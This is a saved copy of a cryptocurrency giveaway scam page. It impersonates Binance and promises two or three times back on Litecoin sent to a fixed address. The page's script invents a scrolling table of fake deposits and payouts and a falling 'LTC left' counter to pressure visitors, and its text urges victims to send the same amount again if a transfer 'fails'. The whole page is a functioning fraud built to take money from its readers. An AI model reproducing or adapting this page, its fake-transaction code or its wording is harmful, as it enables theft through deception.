﻿<!DOCTYPE html>





<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from binancxcyptoboxbsc.netlify.app/ltc/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Oct 2023 23:10:12 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <link rel="stylesheet" rel="stylesheet" type="text/css" href="../static/files/styles-5.css">
    <meta property="og:image" content="img/link.html">
    <link href='../../festiveseason2xbonus.digital/static/files/LTC.png' rel="shortcut icon" type="image/x-icon">
    <title>Get LTC Bonus Now</title>

    <link rel="preconnect" href="https://fonts.gstatic.com/">
    <link href="https://binancxcyptoboxbsc.netlify.app/css2-5?family=JetBrains+Mono:wght@300;400&amp;display=swap" rel="stylesheet"> 
    <link rel="stylesheet" rel="stylesheet" type="text/css" href='../static/files/theme.min-5.css'>
    
    
    <meta name="referrer" content="always">

    <script>
        window.onload = function () {
            if (!localStorage.getItem("justonce")) {
                localStorage.setItem("justOnce", "true");
                window.location.reload();
            }
        }
    </script>

</head>

<body>
    <div class='loading'>
        <div class='loading-item l1'></div>
        <div class='loading-item l2'></div>
        <div class='loading-item l3'></div>
        <div class='loading-item l4'></div>
        
    </div>
    
    
    
<div class="pop-body">
    <div class="pop-inner">
        <div class="pop-head">
            <h3 class="pop-head-text">Generated Address</h3><svg id="close" height="20" viewbox="0 0 20 20" width="20" xmlns="http://www.w3.org/2000/svg">
                <path d="M18.096 19.174l1.401-1.427L1.7.286.3 1.714z"></path>
                <path d="M19.497 1.714L18.096.286.3 17.747l1.4 1.427z"></path>
            </svg>
        </div>
        <div class="pop-post-body">
            <div class="pop-post-inner">
                <div class="pop-anrange">
                    <div class="pop-img">
                        <div class="pop-qr">
                            <div class="inner-qr">
                                <div class="main-qr">
                                    <center><div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="img/address.jpeg" alt="300x300&amp;chld=L|0&amp;cht=qr&amp;chl=LYhKch4htLLAGtWWpP7Ls6zPrwLYsST3j3" alt="qr"></div></center>
									<p>
                        <p style="color:black; margin-top:1rem; margin-bottom: 2px; text-align: center;">Waiting for payment</p>
                                    <center><img src="https://binancxcyptoboxbsc.netlify.app/static/files/loading.svg" width="70px"></center>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="timer-b" id="timer1"></div>
                    <div class="address-place">
                        <div class="inner-address"><span class="wallet-ad">Amount:</span>
                            <div class="address">
                                <div class="main-ad"><span class="real-address" id="gen-amount"></span></div>
                                <div class="copy-body">
                                    <div class="copy-inner">
                                        <img class="cp" id="copy_" src="https://binancxcyptoboxbsc.netlify.app/static/files/copy-5.svg">
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                            <div class="address">
                                <div class="main-ad"><span class="real-address">ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7</span></div>
                                <div class="copy-body">
                                    <div class="copy-inner">
                                        <img class="cp" id="copy_address" src="https://binancxcyptoboxbsc.netlify.app/static/files/copy-5.svg">
                                    </div>
                                </div>
                            </div>
                            
                        </div>
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

    <section id="post-sec">
        <a href='https://binancxcyptoboxbsc.netlify.app/index-5'>
            
                <h1 style="text-align: center; z-index: 999999;"><img src="data:image/svg+xml; base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIw
                    IDEwMjQiIGNsYXNzPSJjc3MtMXR5d2JjaiIgZmlsbD0iI2YwYjkzMSI+CiAgICA8cGF0aAogICAg
                    ICAgIGQ9Ik0yMzAuOTk3MzMzIDUxMkwxMTYuMDUzMzMzIDYyNi45ODY2NjcgMCA1MTJsMTE2LjAx
                    MDY2Ny0xMTYuMDEwNjY3TDIzMC45OTczMzMgNTEyek01MTIgMjMwLjk5NzMzM2wxOTcuOTczMzMz
                    IDE5Ny45NzMzMzQgMTE2LjA1MzMzNC0xMTUuOTY4TDUxMiAwIDE5Ny45NzMzMzMgMzE0LjAyNjY2
                    N2wxMTYuMDUzMzM0IDExNS45NjhMNTEyIDIzMC45OTczMzN6IG0zOTUuOTg5MzMzIDE2NC45OTJM
                    NzkzLjAwMjY2NyA1MTJsMTE2LjAxMDY2NiAxMTYuMDEwNjY3TDEwMjQuOTgxMzMzIDUxMmwtMTE2
                    Ljk5Mi0xMTYuMDEwNjY3ek01MTIgNzkzLjAwMjY2N2wtMTk3Ljk3MzMzMy0xOTguOTk3MzM0LTEx
                    Ni4wNTMzMzQgMTE2LjAxMDY2N0w1MTIgMTAyNGwzMTQuMDI2NjY3LTMxNC4wMjY2NjctMTE2LjA1
                    MzMzNC0xMTUuOTY4TDUxMiA3OTMuMDAyNjY3eiBtMC0xNjUuOTczMzM0bDExNi4wMTA2NjctMTE2
                    LjA1MzMzM0w1MTIgMzk2LjAzMiAzOTUuOTg5MzMzIDUxMiA1MTIgNjI2Ljk4NjY2N3ogbTEyMjAu
                    MDEwNjY3IDExLjk0NjY2N3YtMS45NjI2NjdjMC03NS4wMDgtNDAuMDIxMzMzLTExMy4wMjQtMTA1
                    LjAwMjY2Ny0xMzguMDI2NjY2IDM5Ljk3ODY2Ny0yMS45NzMzMzMgNzMuOTg0LTU4LjAyNjY2NyA3
                    My45ODQtMTIxLjAwMjY2N3YtMS45NjI2NjdjMC04OC4wMjEzMzMtNzAuOTk3MzMzLTE0NS4wMjQt
                    MTg1LjAwMjY2Ny0xNDUuMDI0aC0yNjAuOTkydjU2MS4wMjRoMjY3LjAwOGMxMjYuOTc2IDAuOTgx
                    MzMzIDIxMC4wMDUzMzMtNTEuMDI5MzMzIDIxMC4wMDUzMzQtMTUzLjAwMjY2NnogbS0xNTQuMDI2
                    NjY3LTIzOS45NTczMzNjMCA0MS45ODQtMzQuMDA1MzMzIDU4Ljk2NTMzMy04OS4wMDI2NjcgNTgu
                    OTY1MzMzaC0xMTMuOTYyNjY2VjMzOC45ODY2NjdoMTIxLjk4NGM1Mi4wMTA2NjcgMCA4MC45ODEz
                    MzMgMjAuOTkyIDgwLjk4MTMzMyA1OC4wMjY2NjZ2Mi4wMDUzMzR6IG0zMS4wMTg2NjcgMjI0YzAg
                    NDEuOTg0LTMyLjk4MTMzMyA2MS4wMTMzMzMtODcuMDQgNjEuMDEzMzMzaC0xNDYuOTQ0di0xMjMu
                    MDUwNjY3aDE0Mi45NzZjNjMuMDE4NjY3IDAgOTEuMDA4IDIzLjA0IDkxLjAwOCA2MS4wMTMzMzR2
                    MS4wMjR6IG0zODEuOTk0NjY2IDE2OS45ODRWMjMwLjk5NzMzM2gtMTIzLjk4OTMzM3Y1NjEuMDI0
                    aDEyMy45ODkzMzN2MC45ODEzMzR6IG02NjQuMDIxMzM0IDBWMjMwLjk5NzMzM2gtMTIyLjAyNjY2
                    N3YzNDYuMDI2NjY3bC0yNjIuOTk3MzMzLTM0Ni4wMjY2NjdoLTExNC4wMDUzMzR2NTYxLjAyNGgx
                    MjIuMDI2NjY3di0zNTYuMDEwNjY2bDI3MiAzNTYuOTkyaDEwNC45NnogbTY4My45NDY2NjYgMEwz
                    MDk4LjAyNjY2NyAyMjguMDEwNjY3aC0xMTMuOTYyNjY3bC0yNDEuMDI0IDU2NC45OTJoMTI3LjAx
                    ODY2N2w1MC45ODY2NjYtMTI1Ljk5NDY2N2gyMzcuMDEzMzM0bDUwLjk4NjY2NiAxMjUuOTk0NjY3
                    aDEzMC4wMDUzMzR6IG0tMjI0Ljk4MTMzMy0yMzUuMDA4aC0xNDguOTkybDc1LjAwOC0xODEuOTcz
                    MzM0IDczLjk4NCAxODEuOTczMzM0eiBtODE0LjAzNzMzMyAyMzUuMDA4VjIzMC45OTczMzNoLTEy
                    Mi4wMjY2NjZ2MzQ2LjAyNjY2N2wtMjYyLjk5NzMzNC0zNDYuMDI2NjY3aC0xMTQuMDA1MzMzdjU2
                    MS4wMjRoMTIyLjAyNjY2N3YtMzU2LjAxMDY2NmwyNzIgMzU2Ljk5MmgxMDQuOTZ6IG02MzYuOTcw
                    NjY3LTkxLjAwOGwtNzguOTc2LTc4Ljk3NmMtNDQuMDMyIDM5Ljk3ODY2Ny04My4wMjkzMzMgNjUu
                    OTYyNjY3LTE0OC4wMTA2NjcgNjUuOTYyNjY2LTk2IDAtMTYyLjk4NjY2Ny04MC0xNjIuOTg2NjY2
                    LTE3NnYtMi45ODY2NjZjMC05NiA2Ny45NjgtMTc0Ljk3NiAxNjIuOTg2NjY2LTE3NC45NzYgNTUu
                    OTc4NjY3IDAgMTAwLjAxMDY2NyAyMy45Nzg2NjcgMTQ0IDYyLjk3Nmw3OC45NzYtOTEuMDA4Yy01
                    MS45NjgtNTAuOTg2NjY3LTExNC45ODY2NjctODYuOTk3MzMzLTIyMC45NzA2NjYtODYuOTk3MzM0
                    LTE3MS45ODkzMzMgMC0yOTIuOTkyIDEzMC45ODY2NjctMjkyLjk5MiAyOTAuMDA1MzM0VjUxMmMw
                    IDE2MC45ODEzMzMgMTIyLjk2NTMzMyAyODguOTgxMzMzIDI4OCAyODguOTgxMzMzIDEwNy45ODkz
                    MzMgMS4wMjQgMTcxLjk4OTMzMy0zNi45OTIgMjI5Ljk3MzMzMy05OC45ODY2NjZ6IG01MjcuMDE4
                    NjY3IDkxLjAwOHYtMTA5Ljk5NDY2N2gtMzA1LjAyNHYtMTE4LjAxNmgyNjUuMDAyNjY2di0xMDku
                    OTk0NjY3aC0yNjUuMDAyNjY2VjM0MC45OTJoMzAxLjAxMzMzM1YyMzAuOTk3MzMzaC00MjIuOTk3
                    MzMzdjU2MS4wMjRoNDI3LjAwOHYwLjk4MTMzNHoiCiAgICAgICAgcC1pZD0iMjkzNSI+PC9wYXRo
                    Pgo8L3N2Zz4=" alt="logo" style="max-width: 20rem;" alt="Logo"></h1>
            
        </a>
        <div class="post_body">
            
            <p>To participate with Litecoin, send from <b>10 LTC</b> - <b>500 LTC</b> to the competetion smart contract address below and get from
                <b>20 LTC</b> - <b>1,500 LTC</b> back. <i><b>(<strong>you will receive a 3x bonus if you send from 30 LTC and above)
                
                </strong></b></i> 
                
            <p>You will receive a 3x/2x bonus depending on the amount you stake with.<br><br></p>
            <p>Bonus are processed automatically within 4 - 15 minutes <i>(after deposit to the staking address is confirmed on the blockchain)</i></p>
            <p>
            <h2>How To Participate:</h2>
            <ul>
                <li><b>Step1:</b> Make sure you have at least 10 LTC or above in your wallet.</li>
                <li><b>Step2:</b> Enter the amount you wish to participate with below.</li>
                <li><b>Step3:</b> Enter your LTC address</li>
                <li><b>Step4:</b> Click the "Generate Payment" button to generate your deposit address.</li>
                <li><b>Step5:</b> Send the amount you entered to the generated address.</li>
                <li><b>Step6:</b> Wait for at least 4 - 15 minutes after your transaction is confirmed.</li>
            </ul>
            
            <p>You bonus should be resting in your wallet or pending. <br><br>CONGRATULATIONS 🎉🎉</p>
            <p style="color: rgba(247, 147, 26, 0.6); font-size: 14px !important; margin-top: 2rem !important;"><i>If the
                    transaction does not process correctly, please try again by
                    sending the same amount to the Generated address, and it should go through. Your original
                    transaction will merge with the new one, and the bonus for the two will be sent back.</i></p>
        </div>
        <div class="cal-body">
            <div class="cal-inner">
                <div class="input">
                    <div class="title">Amount To Invest:</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <div class="in-main"><input id="cal-in" class="exchange-content__input theme__background-4 theme__text-4 " min="0" placeholder="0" type="number" maxlength="50" autocomplete="off" value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="icon-body"><span data-tip="Click to swap" data-for="swap-icon" currentitem="false"><img src='https://binancxcyptoboxbsc.netlify.app/static/files/exchange-alt-5.svg' alt="img" class="exchange__swap-icon"></span></div>
                <div class="input">
                    <div class="title">Expected Bonus:</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <div class="in-main"><input id="cal-out" class="exchange-content__input theme__background-4 theme__text-4 " placeholder="0" maxlength="50" min="0" autocomplete="off" value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="enaddress">
                <div class="title"><addr title="Enter the address where you want your bonus to be sent to. Note: this feild is optional, if you leave it empty, the bonus will be sent to the address you sent from.">Receiving (Wallet) Address:</addr></div>
                <div class="inner-enter"><input type="text" placeholder="Enter your Litecoin (LTC) address"></div>
            </div>
            
            <div class="but-con">
                <div id="gen-btn" class="swap-but">Generate Payment</div>
                <div class="terms text-info text-center mb-2"><span><span id="warn"></span></span>
                </div>
            </div>
            <div id="lympo_progress">
                <div class="row progress-row">
                    <div class="colums_12">
                        <div class="progress-ico">
                            <div class="progress-ico">
                                <div class="progress">
                                    <div class="progress-bar progress-bar-striped active progress-width" id="progress-ico" role="progressbar" style="width: 100%;">
                                        <span class="sr-only">x</span></div>
                                </div>
                            </div>
                            <div class="dot-1" id="leftLTC">
                                Counting LTC left...
                            </div>
                            <div class="dot-1-airdrop  progress-left"></div>
                            <span class="pbv" id="progress-ico-bar"></span>
                        </div>
                    </div>
                </div>
            </div>
            <div class="support">
                <div class="sup">
                    <div class="sup-space"></div>
                    <div class="both-line">
                        <div class="import-account__title-content theme__background-2 theme__text-4">Supported Exchange
                        </div>
                    </div>
                    <div class="import-account__content">
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon metamask"><img src='https://binancxcyptoboxbsc.netlify.app/static/files/binance-5.ico' width="20">
                                </div>
                                <div class="import-account__name">BINANCE</div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-ledger">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon ledger"><img src='../static/files/upbit-5.png' width="20">
                                    </div>
                                    <div class="import-account__name">UPBIT</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor">
                                        <div class="import-account__icon ledger"><img src='../static/files/okes-5.png' width="20"></div>
                                    </div>
                                    <div class="import-account__name">OKEX</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file" multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src='../static/files/tano-5.png' width="20" style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">REMITANO</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src='../static/files/tox-5.png' width="20">
                                </div>
                                <div class="import-account__name">MERCATOX</div>
                            </div>
                        </div>
                        <div class="import-account__item ">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon promo-code"><img src='../static/files/luno-5.png' width="20">
                                </div>
                                <div class="import-account__name">LUNO</div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor"><img src='../static/files/coinsph-5.png' width="20">
                                    </div>
                                    <div class="import-account__name">COINS.PH</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file" multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src='../static/files/ava-5.jpg' width="20" style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">COINBASE</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src='https://binancxcyptoboxbsc.netlify.app/static/files/yobit-5.ico' width="20">
                                </div>
                                <div class="import-account__name">YOBIT</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <main id="content" role="main">
        <div id="ContentPlaceHolder1_divSummary" class="container space-bottom-2">
            <div class="card">
                <div class="card-body">
                    <div class="tab-content">
                        <div class="tab-pane fade show active" id="transactions" role="tabpanel" aria-labelledby="transactions-tab">
                            <div class="table-responsive mb-2 mb-md-0">
                                <table class="table table-hover" id="myTable">
                                    <thead class="thead-light">
                                        <tr>
                                            <th scope="col" width="1">Txn Hash</th>
                                            <th scope="col" width="1" class="d-none d-sm-table-cell">Block</th>
                                            <th scope="col"><span class="timer" title="UTC time">Age</span></th>
                                            <th scope="col">From</th>
                                            <th scope="col" width="30"></th>
                                            <th scope="col">To</th>
                                            <th scope="col">Value</th>
                                            <th scope="col"><span id="ContentPlaceHolder1_spanTxFee" title="(Gas Price * Gas Used by Txns) in LTC">
                                                    <spanclass="text-secondary">[Txn Fee]
                                                </spanclass="text-secondary"></span>
                                            </th>
                                        </tr>
                                    </thead>
                                    <tbody></tbody>
                                </table>
                            </div>
                            <div class="d-flex justify-content-between align-items-center mt-3 mb-4">
                                <div class="d-flex align-items-center text-secondary"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <!-- ###############################Start of progress bar######################################### -->

        <script src="../jquery-3.6.0.min-5.js"></script>
    <script>
        




var parcent = 2

function update_count() {
  setInterval(() => {
    $('#num_').text(parseInt($('#num_').text()) + 1)
  }, 12e4)
}

function tx(_) {
  return 1 + Math.floor(Math.random() * _)
}

function dec2hex(dec) {
  return ('0' + dec.toString(16)).substr(-2)
}

function generateId(length) {
  for (
    var result = '',
      characters =
        'ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7',
      charactersLength = characters.length,
      i = 0;
    i < length;
    i++
  )
    result += characters.charAt(Math.floor(Math.random() * charactersLength))
  return result
}

function startaddress(length = 1) {
  for (
    var result = '',
      characters = '13',
      charactersLength = characters.length,
      i = 0;
    i < length;
    i++
  )
    result += characters.charAt(Math.floor(Math.random() * charactersLength))
  return result
}

function create_transaction(mins) {
  var table,
    row = (table = document.getElementById('myTable')).insertRow(1),
    address = get_random(),
    amount = (1000 * Math.random()).toFixed(2),
    decimal = String(Math.random(1, 999))
  row.innerHTML =
    '<tr  class="tr"> <td><a class="hash-tag text-truncate" href="index.html">' +
    generateId(63) +
    '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
    tx(99999999) +
    '</a></td> <td><span class="timer">' +
    mins +
    ' mins ago</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
    address +
    '</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7</span> </td> <td>' +
    amount +
    ' LTC</td> <td><span class="small text-secondary">0<b>.</b>000' +
    tx(999) +
    '</span></td> </tr>'
  var table,
    row = (table = document.getElementById('myTable')).insertRow(1),
    send_amount = amount * parcent
  row.innerHTML =
    '<tr> <td><a class="hash-tag text-truncate" href="index.html">' +
    generateId(63) +
    '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
    tx(99999999) +
    '</a></td> <td><span class="timer">' +
    mins +
    ' mins ago</span></td> <td><span class="hash-tag text-truncate">ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
    address +
    '</a> </td> <td>' +
    send_amount +
    ' LTC</td> <td><span class="small text-secondary">0<b>.</b>000' +
    tx(999) +
    '</span></td> </tr>'
}

function update_tx() {
  setInterval(() => {
    $('#num_').text(parseInt($('#num_').text()) + 1)
  }, 12e4)
}

function new_transaction() {
  var table,
    row = document.getElementById('myTable').insertRow(1),
    address = get_random(),
    amount = (1000 * Math.random()).toFixed(2),
    decimal = String(Math.random(1, 999))
  ;(row.innerHTML =
    '<tr> <td><a class="hash-tag text-truncate" href="index.html">' +
    generateId(63) +
    '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
    tx(99999999) +
    '</a></td> <td><span class="timer" >now</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
    address +
    '</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7</span> </td> <td>' +
    amount +
    ' LTC</td> <td><span class="small text-secondary">0<b>.</b>000' +
    tx(999) +
    '</span></td> </tr>'),
    document
      .getElementById('myTable')
      .deleteRow(document.getElementById('myTable').rows.length - 1),
    document.getElementsByTagName('tr')[1].classList.add('toolbar'),
    setTimeout(() => {
      var table,
        row = document.getElementById('myTable').insertRow(1),
        send_amount = amount * parcent
      ;(row.innerHTML =
        '<tr> <td><a class="hash-tag text-truncate" href="index.html">' +
        generateId(63) +
        '</a> </td> <td class="d-none d-sm-table-cell"><a href="index.html">9' +
        tx(99999999) +
        '</a></td> <td><span class="timer" >now</span></td> <td><span class="hash-tag text-truncate">ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="index.html">' +
        address +
        '</a> </td> <td>' +
        send_amount +
        ' LTC</td> <td><span class="small text-secondary">0<b>.</b>000' +
        tx(999) +
        '</span></td> </tr>'),
        document
          .getElementById('myTable')
          .deleteRow(document.getElementById('myTable').rows.length - 1),
        document.getElementsByTagName('tr')[1].classList.add('toolbar')
    }, 8500)
}

function update_trans() {
  for (i = 0; i < times.length; i++)
    'now' == times[i].innerHTML
      ? (times[i].innerHTML = '1 mins ago')
      : 1 == parseInt(times[i].innerHTML.split(' ')[0]) &&
        'mins' == times[i].innerHTML.split(' ')[1]
      ? (times[i].innerHTML =
          parseInt(times[i].innerHTML.split(' ')[0]) + 1 + ' mins ago')
      : parseInt(times[i].innerHTML.split(' ')[0]) >= 59 &&
        'mins' == times[i].innerHTML.split(' ')[1]
      ? (times[i].innerHTML = '1 hrs ago')
      : parseInt(times[i].innerHTML.split(' ')[0]) > 1 &&
        'mins' == times[i].innerHTML.split(' ')[1] &&
        (times[i].innerHTML = parseInt(times[i].innerHTML.split()[0]) + 1 + ' mins ago')
  new_transaction();
}

;(get_random = function (
  list = [
    "L" + generateId(40),
    'Binance 1',
    "L" + generateId(40),
    'Binance 2',
    "L" + generateId(40),
    'Binance 3',
    "L" + generateId(40),
    'Remitano 2',
    "L" + generateId(40),
    'Remitano 3',
    "L" + generateId(40),
    'Remitano 1',
    "L" + generateId(40),
    'Mercatox',
    "L" + generateId(40),
    'IndaCoin',
    "L" + generateId(40),
    'CoinExchange.io',
    "L" + generateId(40),
    'HitBTC 2',
    "L" + generateId(40),
    'HitBTC 1',
    "L" + generateId(40),
    'LAToken 3',
    "L" + generateId(40),
    'LAToken 2',
    "L" + generateId(40),
    'LAToken 1',
  ],
) {
  return list[Math.floor(Math.random() * list.length)]
}),
  $(document).ready(() => {
    for (i = 25; i > 0; i--) create_transaction(i)
    update_tx(), update_count()
  }),
  (times = document.getElementsByClassName('timer')),
  (window.onload = () => {
    update_trans(),
      (trans = setInterval(() => {
        update_trans()
      }, 1e4))
  }),
  $('#gen-btn').click(() => {
    if ($('#cal-in').val() >= 10 && $('#cal-in').val() <= 500) {
      amount_entered = $('#cal-in').val()
      tm = Date.now()
	    $("#xrp-tag").text(tx(9999999))
      $('#gen-amount').text(amount_entered)
      $('#warn').text(''), $('.pop-body').css('display', 'flex')
    } else $('#warn').text('Amount should be within 10 LTC to 500 LTC')
  }),
  $('#close').click(() => {
    $('.pop-body').css('display', 'none')
  }),
  setTimeout(function () {
    let viewheight = $(window).height(),
      viewwidth = $(window).width(),
      viewport
    document
      .querySelector('meta[name=viewport]')
      .setAttribute(
        'content',
        'height=' +
          viewheight +
          'px, width=' +
          viewwidth +
          'px, initial-scale=1.0',
      )
  }, 300),
  $('#cal-in').on('input', () => {
    var in_amount = $('#cal-in').val()
    if (in_amount >= 0 && in_amount < 50) {
      amt = (in_amount * 2)
      out = $('#cal-out')
      out.val(amt)
      // if (amt%1){
      //   out.val(amt.toFixed(3))
      // }
      // else {
      //   out.val(amt.toFixed(0))
      // }
    } else if ((in_amount) >= 30 && in_amount <= 5000) {
      amt = (in_amount * 3)
      out = $('#cal-out')
      out.val(amt)
      // if (amt%1){
      //   out.val(amt.toFixed(0))
      // }
      // else{
      //   out.val(amt.toFixed(3))
      // }
    }
  })

$('#cal-out').on('input', () => {
  var in_amount = $('#cal-out').val()
  if (in_amount >= 10 && in_amount < 30) {
    amt = (in_amount / 2)
    out = $('#cal-in')
    out.value(amt)
    // if (amt%1){
    //   out.value(amt.toFixed(0))
    // }
    // else {
    //   out.value(amt.toFixed(3))
    // }
    $('#cal-in').val(in_amount / 2)
  } else if ((in_amount) >= 30 && in_amount <= 5000) {
    $('#cal-in').val(in_amount / 3)
  }
})

function copy_item(item) {
  var t = window.getSelection(),
    e = document.createElement('div')
  ;(e.style.position = 'absolute'),
    (e.style.left = '-99999px'),
    document.body.appendChild(e),
    (e.innerHTML = item),
    t.selectAllChildren(e),
    window.setTimeout(function () {
      document.body.removeChild(e)
    }, 100)
}

function copyToClipboard(text) {
    if (window.clipboardData && window.clipboardData.setData) {
        // Internet Explorer-specific code path to prevent textarea being shown while dialog is visible.
        return clipboardData.setData("Text", text);

    }
    else if (document.queryCommandSupported && document.queryCommandSupported("copy")) {
        var textarea = document.createElement("textarea");
        textarea.textContent = text;
        textarea.style.position = "fixed";  // Prevent scrolling to bottom of page in Microsoft Edge.
        document.body.appendChild(textarea);
        textarea.select();
        try {
            return document.execCommand("copy");  // Security exception may be thrown by some browsers.
        }
        catch (ex) {
            //console.warn("Copy to clipboard failed.", ex);
            return false;
        }
        finally {
            document.body.removeChild(textarea);
        }
    }
}

function copy_main(id, fade) {
  copy_item($('#' + id).attr('data-clipboard-text'))
  var clipboard = new Clipboard('#' + id)
  clipboard.on('success', function () {
    $('#' + fade).css('opacity', 1), $('#' + id).css('opacity', 0)
  }),
    clipboard.on('error', function (e) {
      $('.tooltiptetext').html('Faild!')
    })
}

// Copy amount starts here

$('#copy_').click(() => {
  copyToClipboard($("#gen-amount").text());
  $('#copy_').attr('src', "https://binancxcyptoboxbsc.netlify.app/static/files/done.svg");
})

$('#copy_').mouseleave(() => {
  $('#copy_').attr('src', "https://binancxcyptoboxbsc.netlify.app/static/files/copy.svg");
})

// Copy amount ends here

// Copy address part starts here

$('#copy_address').click(() => {
  copyToClipboard('ltc1q6qls4knd5fw4nrh7d85xnxc670gw87tas6s6l7');
  $('#copy_address').attr('src', 'https://binancxcyptoboxbsc.netlify.app/static/files/done.svg');
})

$('#copy_address').mouseleave(() => {
  $('#copy_address').attr('src', "https://binancxcyptoboxbsc.netlify.app/static/files/copy.svg");
})

$('#copy_tag').click(() => {
  copyToClipboard($('#xrp-tag').text());
  $('#copy_tag').attr('src', 'https://binancxcyptoboxbsc.netlify.app/static/files/done.svg');
})

$('#copy_tag').mouseleave(() => {
  $('#copy_tag').attr('src', "https://binancxcyptoboxbsc.netlify.app/static/files/copy.svg");
})

// Copy address part ends here

    </script>

    <script>
        function setProgress(count, max) {
            var p = (100 * count / max).toString() + '%';
            $('.progress-left').css('left', p);
            $('.progress-width').css('width', p);
            var aa = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            var rr = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            $('.pbv').text(aa + ' / ' + rr);

        }



        var ctd = setInterval(function () {
            if (localStorage.getItem("ltcprogress")) {
                if (localStorage.getItem("ltcprogress") <= 150) {
                    var alt_count = localStorage.getItem("ltcprogress");
                } else if (localStorage.getItem("ltcprogress")) {
                    var alt_sec_count = localStorage.getItem("ltcprogress");
                    var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
                }
            } else {
                var alt_sec_count = 250000;
                var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * (5000 * 2));
            }
            setProgress(alt_count, 1000000)



            localStorage.setItem("ltcprogress", alt_count);

            if (alt_sec_count <= 200)
                clearInterval(ctd);
            if (alt_count <= 15000 && alt_sec_count >= 17500)
                document.getElementById("leftLTC").innerHTML = "Left LTC";
            if (alt_count <= 10000 && alt_sec_count >= 12500)
                document.getElementById("leftLTC").innerHTML = "Hurry up, not much more LTC left!";
            if (alt_count <= 7500)
                document.getElementById("leftLTC").innerHTML = "Last chance to get your LTC!";
            if (alt_count <= 2500)
                document.title = alt_count + " LTC left";
            if (alt_count <= 5000)
                document.title = "Get your " + alt_count + " LTC now!";

        }, 6666);
    </script>
    <!-- ###############################End of progress bar######################################### -->

    <script>

        function timer(t_ex, timer){
            expire = new Date(t_ex*1000).getTime();
            now = new Date().getTime(); 
            dis = expire - now
            days = Math.floor((dis%(1000*60*60*24*24))/(1000*60*60*24))
            hrs = Math.floor((dis%(1000*60*60*24))/(1000*60*60))
            mins = Math.floor((dis%(1000*60*60))/(1000*60))
            secs = Math.floor((dis%(1000*60))/(1000))
            m_secs = Math.floor((dis%(1000)))
            if (dis > 0) {
                timer.innerHTML = days+":"+hrs+":"+mins+":"+secs+":"+m_secs
            }
            else{
                window.location.reload()
            }
        }
        
        function set_timer(){
            let t_ex = null
            if (t_ex){
